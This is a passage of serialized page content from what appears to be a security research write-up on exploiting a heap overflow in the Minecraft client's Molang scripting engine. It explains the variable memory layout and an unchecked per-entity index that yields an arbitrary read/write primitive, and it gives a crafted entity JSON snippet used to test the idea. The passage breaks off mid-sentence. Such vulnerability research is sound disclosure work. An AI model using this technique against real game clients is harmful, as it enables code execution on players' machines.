struct_fields;\n",{"type":25,"tag":216,"props":156674,"children":156675},{"class":6922,"line":7557},[156676],{"type":25,"tag":216,"props":156677,"children":156678},{"style":6964},[156679],{"type":31,"value":156680},"        \n",{"type":25,"tag":216,"props":156682,"children":156683},{"class":6922,"line":7574},[156684],{"type":25,"tag":216,"props":156685,"children":156686},{"style":6964},[156687],{"type":31,"value":127971},{"type":25,"tag":216,"props":156689,"children":156690},{"class":6922,"line":7591},[156691],{"type":25,"tag":216,"props":156692,"children":156693},{"style":6964},[156694],{"type":31,"value":42960},{"type":25,"tag":216,"props":156696,"children":156697},{"class":6922,"line":7604},[156698],{"type":25,"tag":216,"props":156699,"children":156700},{"style":6964},[156701],{"type":31,"value":20536},{"type":25,"tag":38,"props":156703,"children":156704},{},[156705,156707,156712],{"type":31,"value":156706},"In memory a ",{"type":25,"tag":82,"props":156708,"children":156710},{"className":156709},[],[156711],{"type":31,"value":156530},{"type":31,"value":156713}," instance resembles:",{"type":25,"tag":206,"props":156715,"children":156717},{"code":156716},"      +---------------+---------------+\n+0x00 |  FNV-1 hash   |std::string.buf|\n      +---------------+---------------+\n+0x10 |std::string.buf|std::string.len|\n      +---------------+---------------+\n+0x20 |std::string.cap|   Unknown     |\n      +-------+-------+---------------+\n+0x30 | Type  |Unused |Variable value |\n      +-------+-------+---------------+\n+0x40 |std::vector.buf|std::vector.len|\n      +---------------+---------------+\n+0x50 |std::vector.cap|   Unknown     |\n      +---------------+---------------+\n      |     . . .     |     . . .     |\n",[156718],{"type":25,"tag":82,"props":156719,"children":156720},{"__ignoreMap":7},[156721],{"type":31,"value":156716},{"type":25,"tag":38,"props":156723,"children":156724},{},[156725],{"type":31,"value":156726},"For reference, example debugger view of the layout:",{"type":25,"tag":38,"props":156728,"children":156729},{},[156730],{"type":25,"tag":6467,"props":156731,"children":156733},{"alt":54547,"src":156732},"/posts/minecraft-heap-overflow-to-rce/image8.png",[],{"type":25,"tag":38,"props":156735,"children":156736},{},[156737],{"type":31,"value":156738},"The full structure is larger and contains more fields than shown, but many are irrelevant to the exploit.",{"type":25,"tag":38,"props":156740,"children":156741},{},[156742,156744,156750,156752,156757,156759,156765,156767,156772,156773,156778,156780,156785,156786,156792,156793,156799],{"type":31,"value":156743},"We only care about the ",{"type":25,"tag":82,"props":156745,"children":156747},{"className":156746},[],[156748],{"type":31,"value":156749},"MolangScriptArg",{"type":31,"value":156751}," beginning at offset ",{"type":25,"tag":82,"props":156753,"children":156755},{"className":156754},[],[156756],{"type":31,"value":132850},{"type":31,"value":156758}," because it contains variable values. In the screenshot above, the ",{"type":25,"tag":82,"props":156760,"children":156762},{"className":156761},[],[156763],{"type":31,"value":156764},"value_type",{"type":31,"value":156766}," at ",{"type":25,"tag":82,"props":156768,"children":156770},{"className":156769},[],[156771],{"type":31,"value":132850},{"type":31,"value":1680},{"type":25,"tag":82,"props":156774,"children":156776},{"className":156775},[],[156777],{"type":31,"value":1882},{"type":31,"value":156779}," (meaning float), and the ",{"type":25,"tag":82,"props":156781,"children":156783},{"className":156782},[],[156784],{"type":31,"value":43115},{"type":31,"value":156766},{"type":25,"tag":82,"props":156787,"children":156789},{"className":156788},[],[156790],{"type":31,"value":156791},"0x38",{"type":31,"value":1680},{"type":25,"tag":82,"props":156794,"children":156796},{"className":156795},[],[156797],{"type":31,"value":156798},"0xbf2070c8",{"type":31,"value":179},{"type":25,"tag":38,"props":156801,"children":156802},{},[156803,156805,156811,156813,156818,156820,156825,156826,156831,156833,156838,156840,156845],{"type":31,"value":156804},"During assignment, such as ",{"type":25,"tag":82,"props":156806,"children":156808},{"className":156807},[],[156809],{"type":31,"value":156810},"variable.a = variable.b",{"type":31,"value":156812},", each field of ",{"type":25,"tag":82,"props":156814,"children":156816},{"className":156815},[],[156817],{"type":31,"value":156749},{"type":31,"value":156819}," is copied from variable ",{"type":25,"tag":82,"props":156821,"children":156823},{"className":156822},[],[156824],{"type":31,"value":7171},{"type":31,"value":60744},{"type":25,"tag":82,"props":156827,"children":156829},{"className":156828},[],[156830],{"type":31,"value":162},{"type":31,"value":156832},". Interestingly, the ",{"type":25,"tag":82,"props":156834,"children":156836},{"className":156835},[],[156837],{"type":31,"value":43115},{"type":31,"value":156839}," field is always copied as a ",{"type":25,"tag":82,"props":156841,"children":156843},{"className":156842},[],[156844],{"type":31,"value":59603},{"type":31,"value":156846}," even if the type is a 32-bit float.",{"type":25,"tag":38,"props":156848,"children":156849},{},[156850,156852,156858],{"type":31,"value":156851},"Each entity stores its variables in a per-entity vector called ",{"type":25,"tag":82,"props":156853,"children":156855},{"className":156854},[],[156856],{"type":31,"value":156857},"MolangVariableMap",{"type":31,"value":179},{"type":25,"tag":630,"props":156860,"children":156862},{"id":156861},"molangvariablemap",[156863],{"type":31,"value":156857},{"type":25,"tag":38,"props":156865,"children":156866},{},[156867,156872,156874,156880,156882,156888],{"type":25,"tag":82,"props":156868,"children":156870},{"className":156869},[],[156871],{"type":31,"value":156857},{"type":31,"value":156873}," is simply a ",{"type":25,"tag":82,"props":156875,"children":156877},{"className":156876},[],[156878],{"type":31,"value":156879},"std::vector\u003CMolangVariable *>",{"type":31,"value":156881}," contained per entity. To reason about its memory we need to recall MSVC ",{"type":25,"tag":82,"props":156883,"children":156885},{"className":156884},[],[156886],{"type":31,"value":156887},"std::vector",{"type":31,"value":156889}," layout:",{"type":25,"tag":206,"props":156891,"children":156893},{"code":156892,"language":2254,"meta":7,"className":20473,"style":7},"struct vector {\n    void *buf;\n    void *len;\n    void *cap;\n};\n",[156894],{"type":25,"tag":82,"props":156895,"children":156896},{"__ignoreMap":7},[156897,156909,156925,156941,156957],{"type":25,"tag":216,"props":156898,"children":156899},{"class":6922,"line":6923},[156900,156904],{"type":25,"tag":216,"props":156901,"children":156902},{"style":6936},[156903],{"type":31,"value":13357},{"type":25,"tag":216,"props":156905,"children":156906},{"style":6964},[156907],{"type":31,"value":156908}," vector {\n",{"type":25,"tag":216,"props":156910,"children":156911},{"class":6922,"line":6769},[156912,156916,156920],{"type":25,"tag":216,"props":156913,"children":156914},{"style":6936},[156915],{"type":31,"value":20506},{"type":25,"tag":216,"props":156917,"children":156918},{"style":6953},[156919],{"type":31,"value":13773},{"type":25,"tag":216,"props":156921,"children":156922},{"style":6964},[156923],{"type":31,"value":156924},"buf;\n",{"type":25,"tag":216,"props":156926,"children":156927},{"class":6922,"line":6778},[156928,156932,156936],{"type":25,"tag":216,"props":156929,"children":156930},{"style":6936},[156931],{"type":31,"value":20506},{"type":25,"tag":216,"props":156933,"children":156934},{"style":6953},[156935],{"type":31,"value":13773},{"type":25,"tag":216,"props":156937,"children":156938},{"style":6964},[156939],{"type":31,"value":156940},"len;\n",{"type":25,"tag":216,"props":156942,"children":156943},{"class":6922,"line":7005},[156944,156948,156952],{"type":25,"tag":216,"props":156945,"children":156946},{"style":6936},[156947],{"type":31,"value":20506},{"type":25,"tag":216,"props":156949,"children":156950},{"style":6953},[156951],{"type":31,"value":13773},{"type":25,"tag":216,"props":156953,"children":156954},{"style":6964},[156955],{"type":31,"value":156956},"cap;\n",{"type":25,"tag":216,"props":156958,"children":156959},{"class":6922,"line":7110},[156960],{"type":25,"tag":216,"props":156961,"children":156962},{"style":6964},[156963],{"type":31,"value":20536},{"type":25,"tag":38,"props":156965,"children":156966},{},[156967,156972,156974,156979,156981,156987,156989,156994,156995,157000],{"type":25,"tag":82,"props":156968,"children":156970},{"className":156969},[],[156971],{"type":31,"value":154053},{"type":31,"value":156973}," points to the allocated array of elements, ",{"type":25,"tag":82,"props":156975,"children":156977},{"className":156976},[],[156978],{"type":31,"value":13094},{"type":31,"value":156980}," points just past the last used element, and ",{"type":25,"tag":82,"props":156982,"children":156984},{"className":156983},[],[156985],{"type":31,"value":156986},"cap",{"type":31,"value":156988}," points to the end of the allocated buffer. Notably, the types of ",{"type":25,"tag":82,"props":156990,"children":156992},{"className":156991},[],[156993],{"type":31,"value":13094},{"type":31,"value":1307},{"type":25,"tag":82,"props":156996,"children":156998},{"className":156997},[],[156999],{"type":31,"value":156986},{"type":31,"value":157001}," aren't typical integer types for sizes, but both are pointers.",{"type":25,"tag":38,"props":157003,"children":157004},{},[157005],{"type":31,"value":157006},"Example layout for a vector holding three variable pointers plus one unused slot:",{"type":25,"tag":206,"props":157008,"children":157010},{"code":157009},"+---------+         +--------------------+\n|   buf   +-------> | MolangVariable A*  |\n+---------+         +--------------------+\n|   len   +----+    | MolangVariable B*  |\n+---------+    |    +--------------------+\n|   cap   |    |    | MolangVariable C*  |\n+----+----+    |    +--------------------+\n     |         +--> | Empty element slot |\n     |              +--------------------+\n     |                                   ^\n     +-----------------------------------+\n",[157011],{"type":25,"tag":82,"props":157012,"children":157013},{"__ignoreMap":7},[157014],{"type":31,"value":157009},{"type":25,"tag":38,"props":157016,"children":157017},{},[157018,157020,157026,157028,157034],{"type":31,"value":157019},"Because each entity can create and initialize variables independently, the indices of specific variables (e.g., ",{"type":25,"tag":82,"props":157021,"children":157023},{"className":157022},[],[157024],{"type":31,"value":157025},"variable.result",{"type":31,"value":157027},") may differ between entities. To get around this, ",{"type":25,"tag":82,"props":157029,"children":157031},{"className":157030},[],[157032],{"type":31,"value":157033},"MolangIndexMap",{"type":31,"value":157035}," is used to map a global variable name to the correct per-entity slot.",{"type":25,"tag":630,"props":157037,"children":157039},{"id":157038},"molangindexmap",[157040],{"type":31,"value":157033},{"type":25,"tag":38,"props":157042,"children":157043},{},[157044,157049,157051,157057,157059,157065],{"type":25,"tag":82,"props":157045,"children":157047},{"className":157046},[],[157048],{"type":31,"value":157033},{"type":31,"value":157050}," is a per-entity ",{"type":25,"tag":82,"props":157052,"children":157054},{"className":157053},[],[157055],{"type":31,"value":157056},"std::vector\u003Cuint16_t>",{"type":31,"value":157058},". The engine maintains a global hashmap that maps variable names to a global index. When the client encounters a statement like ",{"type":25,"tag":82,"props":157060,"children":157062},{"className":157061},[],[157063],{"type":31,"value":157064},"variable.result = 0",{"type":31,"value":157066}," it:",{"type":25,"tag":6711,"props":157068,"children":157069},{},[157070,157080,157090],{"type":25,"tag":2043,"props":157071,"children":157072},{},[157073,157075],{"type":31,"value":157074},"Checks the global hashmap for ",{"type":25,"tag":82,"props":157076,"children":157078},{"className":157077},[],[157079],{"type":31,"value":13037},{"type":25,"tag":2043,"props":157081,"children":157082},{},[157083,157085],{"type":31,"value":157084},"If found, uses the global index to look up the per-entity index in ",{"type":25,"tag":82,"props":157086,"children":157088},{"className":157087},[],[157089],{"type":31,"value":157033},{"type":25,"tag":2043,"props":157091,"children":157092},{},[157093,157095],{"type":31,"value":157094},"If not found, creates a new global entry and assigns it ",{"type":25,"tag":82,"props":157096,"children":157098},{"className":157097},[],[157099],{"type":31,"value":157100},"last_index + 1",{"type":25,"tag":38,"props":157102,"children":157103},{},[157104,157106,157111,157113,157118,157120,157125,157127,157132,157134,157139,157140,157146,157148,157153],{"type":31,"value":157105},"This means the same global index for variable ",{"type":25,"tag":82,"props":157107,"children":157109},{"className":157108},[],[157110],{"type":31,"value":13037},{"type":31,"value":157112}," maps to the same position inside every entity’s ",{"type":25,"tag":82,"props":157114,"children":157116},{"className":157115},[],[157117],{"type":31,"value":157033},{"type":31,"value":157119},", but the actual ",{"type":25,"tag":82,"props":157121,"children":157123},{"className":157122},[],[157124],{"type":31,"value":156530},{"type":31,"value":157126}," for ",{"type":25,"tag":82,"props":157128,"children":157130},{"className":157129},[],[157131],{"type":31,"value":13037},{"type":31,"value":157133}," may live at different slots inside each entity's ",{"type":25,"tag":82,"props":157135,"children":157137},{"className":157136},[],[157138],{"type":31,"value":156857},{"type":31,"value":22491},{"type":25,"tag":82,"props":157141,"children":157143},{"className":157142},[],[157144],{"type":31,"value":157145},"Entity.MolangIndexMap[global_index]",{"type":31,"value":157147}," stores the per-entity index (slot) of variable ",{"type":25,"tag":82,"props":157149,"children":157151},{"className":157150},[],[157152],{"type":31,"value":13037},{"type":31,"value":179},{"type":25,"tag":38,"props":157155,"children":157156},{},[157157,157159,157164,157166,157171,157173,157178,157180,157185,157187,157193,157195,157200],{"type":31,"value":157158},"Importantly, we found that indices in the ",{"type":25,"tag":82,"props":157160,"children":157162},{"className":157161},[],[157163],{"type":31,"value":157033},{"type":31,"value":157165}," are trusted and the client does not validate that a per-entity index actually lies within the bounds of that entity’s ",{"type":25,"tag":82,"props":157167,"children":157169},{"className":157168},[],[157170],{"type":31,"value":156857},{"type":31,"value":157172},". This means that if we overwrite the index of variable ",{"type":25,"tag":82,"props":157174,"children":157176},{"className":157175},[],[157177],{"type":31,"value":13037},{"type":31,"value":157179}," (an example, it can be any variable) with the chunk overlap and make it out-of-bounds for that entity’s ",{"type":25,"tag":82,"props":157181,"children":157183},{"className":157182},[],[157184],{"type":31,"value":156857},{"type":31,"value":157186},", we could read from and write to ",{"type":25,"tag":82,"props":157188,"children":157190},{"className":157189},[],[157191],{"type":31,"value":157192},"address + 0x38",{"type":31,"value":157194}," through ",{"type":25,"tag":82,"props":157196,"children":157198},{"className":157197},[],[157199],{"type":31,"value":157025},{"type":31,"value":179},{"type":25,"tag":606,"props":157202,"children":157204},{"id":157203},"building-a-molang-arbitrary-rw-primitive",[157205],{"type":31,"value":157206},"Building a Molang Arbitrary R/W Primitive",{"type":25,"tag":38,"props":157208,"children":157209},{},[157210,157212,157217,157219,157224],{"type":31,"value":157211},"We needed some pointer inside a heap-sprayable object that we could use to build an arbitrary read/write primitive in Molang. Eventually, we came up with the thought of using internal pointers of ",{"type":25,"tag":82,"props":157213,"children":157215},{"className":157214},[],[157216],{"type":31,"value":156887},{"type":31,"value":157218}," - specifically, of ",{"type":25,"tag":82,"props":157220,"children":157222},{"className":157221},[],[157223],{"type":31,"value":156857},{"type":31,"value":157225}," vector.",{"type":25,"tag":38,"props":157227,"children":157228},{},[157229,157231,157236,157238,157243,157244,157249,157251,157256],{"type":31,"value":157230},"Because every entity object is heap-allocated and contains a ",{"type":25,"tag":82,"props":157232,"children":157234},{"className":157233},[],[157235],{"type":31,"value":156857},{"type":31,"value":157237}," vector, we realised we might be able to overwrite a variable index so it reads the ",{"type":25,"tag":82,"props":157239,"children":157241},{"className":157240},[],[157242],{"type":31,"value":154053},{"type":31,"value":59760},{"type":25,"tag":82,"props":157245,"children":157247},{"className":157246},[],[157248],{"type":31,"value":156857},{"type":31,"value":157250}," vector belonging to an entity object placed just next the ",{"type":25,"tag":82,"props":157252,"children":157254},{"className":157253},[],[157255],{"type":31,"value":156857},{"type":31,"value":157257}," allocated buffer.",{"type":25,"tag":206,"props":157259,"children":157261},{"code":157260},"      +-------------+ \u003C--+                   \n+---> | variable.a  |    |                   \n|     +-------------+    |                   \n|     | variable.b  |    |                   \n|     +-------------+    +- MolangVariableMap allocated buffer\n|     |    . . .    |    |                   \n|     +-------------+    |                   \n|     | variable.f  |    |                   \n|     +-------------+ \u003C--+--+                \n|     |             |       |                \n|     |             |       |                \n|     |             |       |                \n|     |             |       |                \n|     +------+------+       +- Entity Object \n+-----+ buf  | len  |       |                \n      +------+------+       |                \n      | cap  |      |       |                \n      +------+      |       |                \n      +-------------+ \u003C-----+                                       \n",[157262],{"type":25,"tag":82,"props":157263,"children":157264},{"__ignoreMap":7},[157265],{"type":31,"value":157260},{"type":25,"tag":38,"props":157267,"children":157268},{},[157269,157271,157276,157278,157284,157286,157291,157292,157298,157299,157304,157306,157311,157313,157318,157320,157325,157327,157332,157334,157339,157341,157346,157348,157354,157356,157361,157363,157368],{"type":31,"value":157270},"In the scenario above, the ",{"type":25,"tag":82,"props":157272,"children":157274},{"className":157273},[],[157275],{"type":31,"value":157033},{"type":31,"value":157277}," would map ",{"type":25,"tag":82,"props":157279,"children":157281},{"className":157280},[],[157282],{"type":31,"value":157283},"variable.a",{"type":31,"value":157285}," -> index ",{"type":25,"tag":82,"props":157287,"children":157289},{"className":157288},[],[157290],{"type":31,"value":1882},{"type":31,"value":7026},{"type":25,"tag":82,"props":157293,"children":157295},{"className":157294},[],[157296],{"type":31,"value":157297},"variable.b",{"type":31,"value":157285},{"type":25,"tag":82,"props":157300,"children":157302},{"className":157301},[],[157303],{"type":31,"value":184},{"type":31,"value":157305},", and so on. If we overwrite the index for ",{"type":25,"tag":82,"props":157307,"children":157309},{"className":157308},[],[157310],{"type":31,"value":157283},{"type":31,"value":157312}," with a value that is out-of-bounds for the ",{"type":25,"tag":82,"props":157314,"children":157316},{"className":157315},[],[157317],{"type":31,"value":156857},{"type":31,"value":157319},", it can instead index the ",{"type":25,"tag":82,"props":157321,"children":157323},{"className":157322},[],[157324],{"type":31,"value":154053},{"type":31,"value":157326}," field of the entity object above. Reading ",{"type":25,"tag":82,"props":157328,"children":157330},{"className":157329},[],[157331],{"type":31,"value":157283},{"type":31,"value":157333}," will then return the pointer stored at offset ",{"type":25,"tag":82,"props":157335,"children":157337},{"className":157336},[],[157338],{"type":31,"value":156791},{"type":31,"value":157340}," from the start of the ",{"type":25,"tag":82,"props":157342,"children":157344},{"className":157343},[],[157345],{"type":31,"value":156857},{"type":31,"value":157347}," (which in this diagram corresponds to ",{"type":25,"tag":82,"props":157349,"children":157351},{"className":157350},[],[157352],{"type":31,"value":157353},"variable.f",{"type":31,"value":157355},"), and writing to ",{"type":25,"tag":82,"props":157357,"children":157359},{"className":157358},[],[157360],{"type":31,"value":157283},{"type":31,"value":157362}," will overwrite that pointer - corrupting ",{"type":25,"tag":82,"props":157364,"children":157366},{"className":157365},[],[157367],{"type":31,"value":157353},{"type":31,"value":179},{"type":25,"tag":38,"props":157370,"children":157371},{},[157372,157374,157379,157380,157386,157388,157393,157395,157401,157403,157408,157410,157415,157417,157423,157425,157431,157433,157438],{"type":31,"value":157373},"To leak the address of the Minecraft executable we could increment ",{"type":25,"tag":82,"props":157375,"children":157377},{"className":157376},[],[157378],{"type":31,"value":157283},{"type":31,"value":7016},{"type":25,"tag":82,"props":157381,"children":157383},{"className":157382},[],[157384],{"type":31,"value":157385},"variable.a += 8",{"type":31,"value":157387},"), which advances the pointer used for ",{"type":25,"tag":82,"props":157389,"children":157391},{"className":157390},[],[157392],{"type":31,"value":157353},{"type":31,"value":157394}," by 8 bytes. The Molang script would repeat this until it finds a vtable pointer in the heap. At that point we can write arbitrary values into writable regions of the Minecraft process by setting ",{"type":25,"tag":82,"props":157396,"children":157398},{"className":157397},[],[157399],{"type":31,"value":157400},"variable.a = variable.exe_leak + \u003Coffset>",{"type":31,"value":157402}," - this updates the ",{"type":25,"tag":82,"props":157404,"children":157406},{"className":157405},[],[157407],{"type":31,"value":157353},{"type":31,"value":157409}," pointer to our chosen address, and writing to ",{"type":25,"tag":82,"props":157411,"children":157413},{"className":157412},[],[157414],{"type":31,"value":157353},{"type":31,"value":157416},", for example ",{"type":25,"tag":82,"props":157418,"children":157420},{"className":157419},[],[157421],{"type":31,"value":157422},"variable.f = 1337",{"type":31,"value":157424},", writes the value ",{"type":25,"tag":82,"props":157426,"children":157428},{"className":157427},[],[157429],{"type":31,"value":157430},"1337",{"type":31,"value":157432}," to offset ",{"type":25,"tag":82,"props":157434,"children":157436},{"className":157435},[],[157437],{"type":31,"value":156791},{"type":31,"value":157439}," from that calculated address.",{"type":25,"tag":630,"props":157441,"children":157443},{"id":157442},"testing-the-idea",[157444],{"type":31,"value":157445},"Testing the Idea",{"type":25,"tag":38,"props":157447,"children":157448},{},[157449,157451,157456,157458,157463,157465,157470],{"type":31,"value":157450},"We tested the idea by manually adding a pointer to the start of ",{"type":25,"tag":82,"props":157452,"children":157454},{"className":157453},[],[157455],{"type":31,"value":156857},{"type":31,"value":157457}," and modifying the index of a variable so that it indexed this out-of-bounds pointer. It ",{"type":25,"tag":64,"props":157459,"children":157460},{},[157461],{"type":31,"value":157462},"almost",{"type":31,"value":157464}," worked - below is the state of the ",{"type":25,"tag":82,"props":157466,"children":157468},{"className":157467},[],[157469],{"type":31,"value":156857},{"type":31,"value":157471},"'s allocated buffer before the Molang script executes:",{"type":25,"tag":38,"props":157473,"children":157474},{},[157475],{"type":25,"tag":6467,"props":157476,"children":157478},{"alt":54547,"src":157477},"/posts/minecraft-heap-overflow-to-rce/image9.png",[],{"type":25,"tag":38,"props":157480,"children":157481},{},[157482],{"type":31,"value":157483},"And this is after execution:",{"type":25,"tag":38,"props":157485,"children":157486},{},[157487],{"type":25,"tag":6467,"props":157488,"children":157490},{"alt":54547,"src":157489},"/posts/minecraft-heap-overflow-to-rce/image10.png",[],{"type":25,"tag":38,"props":157492,"children":157493},{},[157494],{"type":31,"value":157495},"For reference, this is what the relevant entity json file containing our Molang looks like:",{"type":25,"tag":206,"props":157497,"children":157499},{"code":157498,"language":37960,"meta":7,"className":37958,"style":7},"{\n  \"format_version\": \"1.10.0\",\n  \"minecraft:client_entity\": {\n    \"description\": {\n      \"identifier\": \"minecraft:leash_knot\",\n\n      [...]\n        \n      \"scripts\": {\n        \"initialize\": [\n          \"variable.a = 0;\",\n          \"variable.b = 0;\",\n          \"variable.c = 0;\",\n          [...]\n        ],\n        \"pre_animation\": [\n          \"variable.a = 2.310732e-27;\"\n        ]\n      },\n    }\n  }\n}\n",[157500],{"type":25,"tag":82,"props":157501,"children":157502},{"__ignoreMap":7},[157503,157510,157531,157543,157555,157576,157583,157590,157597,157609,157622,157634,157646,157658,157674,157681,157693,157701,157709,157716,157723,157730],{"type":25,"tag":216,"props":157504,"children":157505},{"class":6922,"line":6923},[157506],{"type":25,"tag":216,"props":157507,"children":157508},{"style":6964},[157509],{"type":31,"value":14836},{"type":25,"tag":216,"props":157511,"children":157512},{"class":6922,"line":6769},[157513,157518,157522,157527],{"type":25,"tag":216,"props":157514,"children":157515},{"style":6947},[157516],{"type":31,"value":157517},"  \"format_version\"",{"type":25,"tag":216,"props":157519,"children":157520},{"style":6964},[157521],{"type":31,"value":19288},{"type":25,"tag":216,"props":157523,"children":157524},{"style":8205},[157525],{"type":31,"value":157526},"\"1.10.0\"",{"type":25,"tag":216,"props":157528,"children":157529},{"style":6964},[157530],{"type":31,"value":7465},{"type":25,"tag":216,"props":157532,"children":157533},{"class":6922,"line":6778},[157534,157539],{"type":25,"tag":216,"props":157535,"children":157536},{"style":6947},[157537],{"type":31,"value":157538},"  \"minecraft:client_entity\"",{"type":25,"tag":216,"props":157540,"children":157541},{"style":6964},[157542],{"type":31,"value":40985},{"type":25,"tag":216,"props":157544,"children":157545},{"class":6922,"line":7005},[157546,157551],{"type":25,"tag":216,"props":157547,"children":157548},{"style":6947},[157549],{"type":31,"value":157550},"    \"description\"",{"type":25,"tag":216,"props":157552,"children":157553},{"style":6964},[157554],{"type":31,"value":40985},{"type":25,"tag":216,"props":157556,"children":157557},{"class":6922,"line":7110},[157558,157563,157567,157572],{"type":25,"tag":216,"props":157559,"children":157560},{"style":6947},[157561],{"type":31,"value":157562},"      \"identifier\"",{"type":25,"tag":216,"props":157564,"children":157565},{"style":6964},[157566],{"type":31,"value":19288},{"type":25,"tag":216,"props":157568,"children":157569},{"style":8205},[157570],{"type":31,"value":157571},"\"minecraft:leash_knot\"",{"type":25,"tag":216,"props":157573,"children":157574},{"style":6964},[157575],{"type":31,"value":7465},{"type":25,"tag":216,"props":157577,"children":157578},{"class":6922,"line":7216},[157579],{"type":25,"tag":216,"props":157580,"children":157581},{"emptyLinePlaceholder":16},[157582],{"type":31,"value":7642},{"type":25,"tag":216,"props":157584,"children":157585},{"class":6922,"line":7244},[157586],{"type":25,"tag":216,"props":157587,"children":157588},{"style":26352},[157589],{"type":31,"value":131373},{"type":25,"tag":216,"props":157591,"children":157592},{"class":6922,"line":7257},[157593],{"type":25,"tag":216,"props":157594,"children":157595},{"style":6964},[157596],{"type":31,"value":156680},{"type":25,"tag":216,"props":157598,"children":157599},{"class":6922,"line":7275},[157600,157605],{"type":25,"tag":216,"props":157601,"children":157602},{"style":6947},[157603],{"type":31,"value":157604},"      \"scripts\"",{"type":25,"tag":216,"props":157606,"children":157607},{"style":6964},[157608],{"type":31,"value":40985},{"type":25,"tag":216,"props":157610,"children":157611},{"class":6922,"line":7296},[157612,157617],{"type":25,"tag":216,"props":157613,"children":157614},{"style":6947},[157615],{"type":31,"value":157616},"        \"initialize\"",{"type":25,"tag":216,"props":157618,"children":157619},{"style":6964},[157620],{"type":31,"value":157621},": [\n",{"type":25,"tag":216,"props":157623,"children":157624},{"class":6922,"line":7305},[157625,157630],{"type":25,"tag":216,"props":157626,"children":157627},{"style":8205},[157628],{"type":31,"value":157629},"          \"variable.a = 0;\"",{"type":25,"tag":216,"props":157631,"children":157632},{"style":6964},[157633],{"type":31,"value":7465},{"type":25,"tag":216,"props":157635,"children":157636},{"class":6922,"line":7557},[157637,157642],{"type":25,"tag":216,"props":157638,"children":157639},{"style":8205},[157640],{"type":31,"value":157641},"          \"variable.b = 0;\"",{"type":25,"tag":216,"props":157643,"children":157644},{"style":6964},[157645],{"type":31,"value":7465},{"type":25,"tag":216,"props":157647,"children":157648},{"class":6922,"line":7574},[157649,157654],{"type":25,"tag":216,"props":157650,"children":157651},{"style":8205},[157652],{"type":31,"value":157653},"          \"variable.c = 0;\"",{"type":25,"tag":216,"props":157655,"children":157656},{"style":6964},[157657],{"type":31,"value":7465},{"type":25,"tag":216,"props":157659,"children":157660},{"class":6922,"line":7591},[157661,157666,157670],{"type":25,"tag":216,"props":157662,"children":157663},{"style":6964},[157664],{"type":31,"value":157665},"          [",{"type":25,"tag":216,"props":157667,"children":157668},{"style":26352},[157669],{"type":31,"value":13547},{"type":25,"tag":216,"props":157671,"children":157672},{"style":6964},[157673],{"type":31,"value":15728},{"type":25,"tag":216,"props":157675,"children":157676},{"class":6922,"line":7604},[157677],{"type":25,"tag":216,"props":157678,"children":157679},{"style":6964},[157680],{"type":31,"value":47615},{"type":25,"tag":216,"props":157682,"children":157683},{"class":6922,"line":7613},[157684,157689],{"type":25,"tag":216,"props":157685,"children":157686},{"style":6947},[157687],{"type":31,"value":157688},"        \"pre_animation\"",{"type":25,"tag":216,"props":157690,"children":157691},{"style":6964},[157692],{"type":31,"value":157621},{"type":25,"tag":216,"props":157694,"children":157695},{"class":6922,"line":7636},[157696],{"type":25,"tag":216,"props":157697,"children":157698},{"style":8205},[157699],{"type":31,"value":157700},"          \"variable.a = 2.310732e-27;\"\n",{"type":25,"tag":216,"props":157702,"children":157703},{"class":6922,"line":7645},[157704],{"type":25,"tag":216,"props":157705,"children":157706},{"style":6964},[157707],{"type":31,"value":157708},"        ]\n",{"type":25,"tag":216,"props":157710,"children":157711},{"class":6922,"line":7654},[157712],{"type":25,"tag":216,"props":157713,"children":157714},{"style":6964},[157715],{"type":31,"value":41162},{"type":25,"tag":216,"props":157717,"children":157718},{"class":6922,"line":7722},[157719],{"type":25,"tag":216,"props":157720,"children":157721},{"style":6964},[157722],{"type":31,"value":7311},{"type":25,"tag":216,"props":157724,"children":157725},{"class":6922,"line":7730},[157726],{"type":25,"tag":216,"props":157727,"children":157728},{"style":6964},[157729],{"type":31,"value":9823},{"type":25,"tag":216,"props":157731,"children":157732},{"class":6922,"line":7760},[157733],{"type":25,"tag":216,"props":157734,"children":157735},{"style":6964},[157736],{"type":31,"value":7874},{"type":25,"tag":38,"props":157738,"children":157739},{},[157740,157742,157747,157749,157754,157756,157761],{"type":31,"value":157741},"As shown, the pointer of a variable at offset ",{"type":25,"tag":82,"props":157743,"children":157745},{"className":157744},[],[157746],{"type":31,"value":156791},{"type":31,"value":157748}," was modified and the core concept works. During ",{"type":25,"tag":82,"props":157750,"children":157752},{"className":157751},[],[157753],{"type":31,"value":156749},{"type":31,"value":157755}," copy, pointers of some other variables above offset ",{"type":25,"tag":82,"props":157757,"children":157759},{"className":157758},[],[157760],{"type":31,"value":156791},{"type":31,"value":157762}," were removed, but this is fine as we control these variables and can simply not update them during execution. However, we discovered other issues with this approach.",{"type":25,"tag":38,"props":157764,"children":157765},{},[157766],{"type":31,"value":157767},"As mentioned earlier, the only number type in Molang is a 32-bit float, which causes two major problems:",{"type":25,"tag":2039,"props":157769,"children":157770},{},[157771,157784],{"type":25,"tag":2043,"props":157772,"children":157773},{},[157774,157776,157782],{"type":31,"value":157775},"The pointer increment is inconsistent because of ASLR. If the lower 32 bits of the address are larger than ",{"type":25,"tag":82,"props":157777,"children":157779},{"className":157778},[],[157780],{"type":31,"value":157781},"FLT_MAX",{"type":31,"value":157783},", the value becomes an invalid float causing the increment operation to fail.",{"type":25,"tag":2043,"props":157785,"children":157786},{},[157787,157789,157794,157796,157801,157802,157807,157809,157814],{"type":31,"value":157788},"As noted before, during assignment, ",{"type":25,"tag":82,"props":157790,"children":157792},{"className":157791},[],[157793],{"type":31,"value":156749},{"type":31,"value":157795}," fields are copied, and the ",{"type":25,"tag":82,"props":157797,"children":157799},{"className":157798},[],[157800],{"type":31,"value":43115},{"type":31,"value":156839},{"type":25,"tag":82,"props":157803,"children":157805},{"className":157804},[],[157806],{"type":31,"value":59603},{"type":31,"value":157808},". Since our source ",{"type":25,"tag":82,"props":157810,"children":157812},{"className":157811},[],[157813],{"type":31,"value":156749},{"type":31,"value":157815}," (calculation rvalue) only has the lower 32 bits populated (due to the 32-bit float type), the upper 32 bits of the destination address are always erased.",{"type":25,"tag":38,"props":157817,"children":157818},{},[157819],{"type":31,"value":157820},"Because of these issues, this idea alone wouldn’t work. We needed to either adjust our approach or come up with an entirely new one.",{"type":25,"tag":630,"props":157822,"children":157824},{"id":157823},"expanding-the-idea",[157825],{"type":31,"value":157826},"Expanding the Idea",{"type":25,"tag":38,"props":157828,"children":157829},{},[157830,157832,157837,157839,157844,157845,157850,157852,157857],{"type":31,"value":157831},"As mentioned earlier, the 